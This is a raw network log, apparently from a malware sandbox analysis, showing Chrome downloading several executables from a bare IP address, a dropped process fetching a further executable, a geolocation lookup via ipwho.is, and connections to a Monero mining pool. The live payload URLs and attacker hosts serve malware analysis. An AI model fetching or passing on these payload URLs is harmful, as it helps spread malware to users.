                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:14 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Content-Length: 1873
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: text/html;charset=UTF-8
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/icons/blank.gif
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /icons/blank.gif HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
                                                                                                                          ETag: "94-3e95722b75a00"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 148
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/gif
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          76.32.126.40.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          76.32.126.40.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          65.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          65.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          65.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-17-179-65deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          95.221.229.192.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          95.221.229.192.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          151.66.156.94.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          151.66.156.94.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          241.154.82.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          241.154.82.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/icons/unknown.gif
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /icons/unknown.gif HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
                                                                                                                          ETag: "f5-3e95722b75a00"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 245
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/gif
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/favicon.ico
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /favicon.ico HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Content-Length: 299
                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/gfgghdhwhatsup.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /gfgghdhwhatsup.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:25 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Thu, 14 Mar 2024 22:03:19 GMT
                                                                                                                          ETag: "4fc200-613a60f22acfa"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 5227008
                                                                                                                          Keep-Alive: timeout=5, max=98
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/icons/binary.gif
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /icons/binary.gif HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:20 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Sat, 20 Nov 2004 21:16:24 GMT
                                                                                                                          ETag: "f6-3e95722b75a00"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 246
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: image/gif
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          41.110.16.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-16-110-41deploystaticakamaitechnologiescom
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/ghfhhminfudk.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /ghfhhminfudk.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:27 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Fri, 15 Mar 2024 10:31:48 GMT
                                                                                                                          ETag: "a6400-613b083e479f8"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 680960
                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-nl
                                                                                                                          GET
                                                                                                                          http://94.156.66.151/hghghjhfhleviticus.exe
                                                                                                                          chrome.exe
                                                                                                                          Remote address:
                                                                                                                          94.156.66.151:80
                                                                                                                          Request
                                                                                                                          GET /hghghjhfhleviticus.exe HTTP/1.1
                                                                                                                          Host: 94.156.66.151
                                                                                                                          Connection: keep-alive
                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                          Referer: http://94.156.66.151/
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:27 GMT
                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                          Last-Modified: Fri, 15 Mar 2024 17:55:19 GMT
                                                                                                                          ETag: "86e00-613b6b608b55a"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 552448
                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-msdownload
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          241.150.49.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          241.150.49.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          g.bing.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          g.bing.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          g.bing.com
                                                                                                                          IN CNAME
                                                                                                                          g-bing-com.a-0001.a-msedge.net
                                                                                                                          g-bing-com.a-0001.a-msedge.net
                                                                                                                          IN CNAME
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          IN A
                                                                                                                          204.79.197.200
                                                                                                                          dual-a-0001.a-msedge.net
                                                                                                                          IN A
                                                                                                                          13.107.21.200
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
                                                                                                                          host: g.bing.com
                                                                                                                          accept-encoding: gzip, deflate
                                                                                                                          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                          Response
                                                                                                                          HTTP/2.0 204
                                                                                                                          cache-control: no-cache, must-revalidate
                                                                                                                          pragma: no-cache
                                                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                          set-cookie: MUID=28F3B267E1F169630259A621E0116881; domain=.bing.com; expires=Sat, 12-Apr-2025 18:10:32 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          access-control-allow-origin: *
                                                                                                                          x-cache: CONFIG_NOCACHE
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: 69AD8C91641C4637BE9D81334AC1B11E Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:32Z
                                                                                                                          date: Mon, 18 Mar 2024 18:10:32 GMT
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
                                                                                                                          host: g.bing.com
                                                                                                                          accept-encoding: gzip, deflate
                                                                                                                          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                          cookie: MUID=28F3B267E1F169630259A621E0116881
                                                                                                                          Response
                                                                                                                          HTTP/2.0 204
                                                                                                                          cache-control: no-cache, must-revalidate
                                                                                                                          pragma: no-cache
                                                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                          set-cookie: MSPTC=7T7-s9hhozesInHRo_Q3m9vYGkHjDhNz6hK5Onj22nQ; domain=.bing.com; expires=Sat, 12-Apr-2025 18:10:33 GMT; path=/; Partitioned; secure; SameSite=None
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          access-control-allow-origin: *
                                                                                                                          x-cache: CONFIG_NOCACHE
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: AB22E6D1636D4DEC91153BB0C4340ACB Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:33Z
                                                                                                                          date: Mon, 18 Mar 2024 18:10:32 GMT
                                                                                                                        • flag-us
                                                                                                                          GET
                                                                                                                          https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
                                                                                                                          Remote address:
                                                                                                                          204.79.197.200:443
                                                                                                                          Request
                                                                                                                          GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
                                                                                                                          host: g.bing.com
                                                                                                                          accept-encoding: gzip, deflate
                                                                                                                          user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                                                                                                          cookie: MUID=28F3B267E1F169630259A621E0116881; MSPTC=7T7-s9hhozesInHRo_Q3m9vYGkHjDhNz6hK5Onj22nQ
                                                                                                                          Response
                                                                                                                          HTTP/2.0 204
                                                                                                                          cache-control: no-cache, must-revalidate
                                                                                                                          pragma: no-cache
                                                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                          access-control-allow-origin: *
                                                                                                                          x-cache: CONFIG_NOCACHE
                                                                                                                          accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          x-msedge-ref: Ref A: CE5DA02DBABC4DED921EFC9D16F83848 Ref B: LON04EDGE1015 Ref C: 2024-03-18T18:10:33Z
                                                                                                                          date: Mon, 18 Mar 2024 18:10:32 GMT
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          200.197.79.204.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          200.197.79.204.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          200.197.79.204.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a-0001a-msedgenet
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          232.168.11.51.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          232.168.11.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          vbc.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          gjhfhgdg.insane.wang
                                                                                                                          IN A
                                                                                                                          94.156.66.151
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          157.123.68.40.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          157.123.68.40.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          28.118.140.52.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          28.118.140.52.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          171.39.242.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          18.134.221.88.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          18.134.221.88.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          18.134.221.88.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a88-221-134-18deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          183.142.211.20.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          183.142.211.20.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          api.filedoge.com
                                                                                                                          vbc.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          api.filedoge.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          api.filedoge.com
                                                                                                                          IN A
                                                                                                                          49.13.193.134
                                                                                                                        • flag-de
                                                                                                                          GET
                                                                                                                          https://api.filedoge.com/download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7
                                                                                                                          vbc.exe
                                                                                                                          Remote address:
                                                                                                                          49.13.193.134:443
                                                                                                                          Request
                                                                                                                          GET /download/1591130eaa3b8a96895bff8d686e7ec2697f986974508c85f0b051191a853aa069fe7ce03179e1c20ec7 HTTP/1.1
                                                                                                                          Host: api.filedoge.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                          Date: Mon, 18 Mar 2024 18:10:55 GMT
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          X-Powered-By: Express
                                                                                                                          Access-Control-Allow-Origin: https://filedoge.com
                                                                                                                          Vary: Origin
                                                                                                                          Content-Disposition: attachment; filename="fdfgfs.exe"
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          134.193.13.49.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          134.193.13.49.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          134.193.13.49.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          static1341931349clients your-serverde
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          ipwho.is
                                                                                                                          dfsdff.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          ipwho.is
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          ipwho.is
                                                                                                                          IN A
                                                                                                                          195.201.57.90
                                                                                                                        • flag-de
                                                                                                                          GET
                                                                                                                          https://ipwho.is/
                                                                                                                          dfsdff.exe
                                                                                                                          Remote address:
                                                                                                                          195.201.57.90:443
                                                                                                                          Request
                                                                                                                          GET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                                                                          Host: ipwho.is
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Response
                                                                                                                          HTTP/1.1 200 OK
                                                                                                                          Date: Mon, 18 Mar 2024 18:11:14 GMT
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: keep-alive
                                                                                                                          Server: ipwhois
                                                                                                                          Access-Control-Allow-Headers: *
                                                                                                                          X-Robots-Tag: noindex
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-17-179-75deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          75.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          90.57.201.195.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          static9057201195clients your-serverde
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          162.19.224.121
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.58.224
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          54.37.137.114
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.65.182
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.89.23.91
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          146.59.154.106
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          163.172.154.142
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          54.37.232.103
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          141.94.23.83
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          51.15.193.130
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                          212.47.253.124
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          xmr-eu1.nanopool.org
                                                                                                                          IN A
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          cf-protected-l7.com
                                                                                                                          explorer.exe
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          cf-protected-l7.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          cf-protected-l7.com
                                                                                                                          IN A
                                                                                                                          134.255.231.136
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          136.231.255.134.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          lavender-leopard-40929zapcloud
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          vps-2ced4041vpsovhnet
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          91.23.89.51.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          Response
                                                                                                                          53.179.17.96.in-addr.arpa
                                                                                                                          IN PTR
                                                                                                                          a96-17-179-53deploystaticakamaitechnologiescom
                                                                                                                        • flag-us
                                                                                                                          DNS
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          Remote address:
                                                                                                                          8.8.8.8:53
                                                                                                                          Request
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          Response
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
                                                                                                                          172.217.168.234
                                                                                                                          chromewebstore.googleapis.com
                                                                                                                          IN A
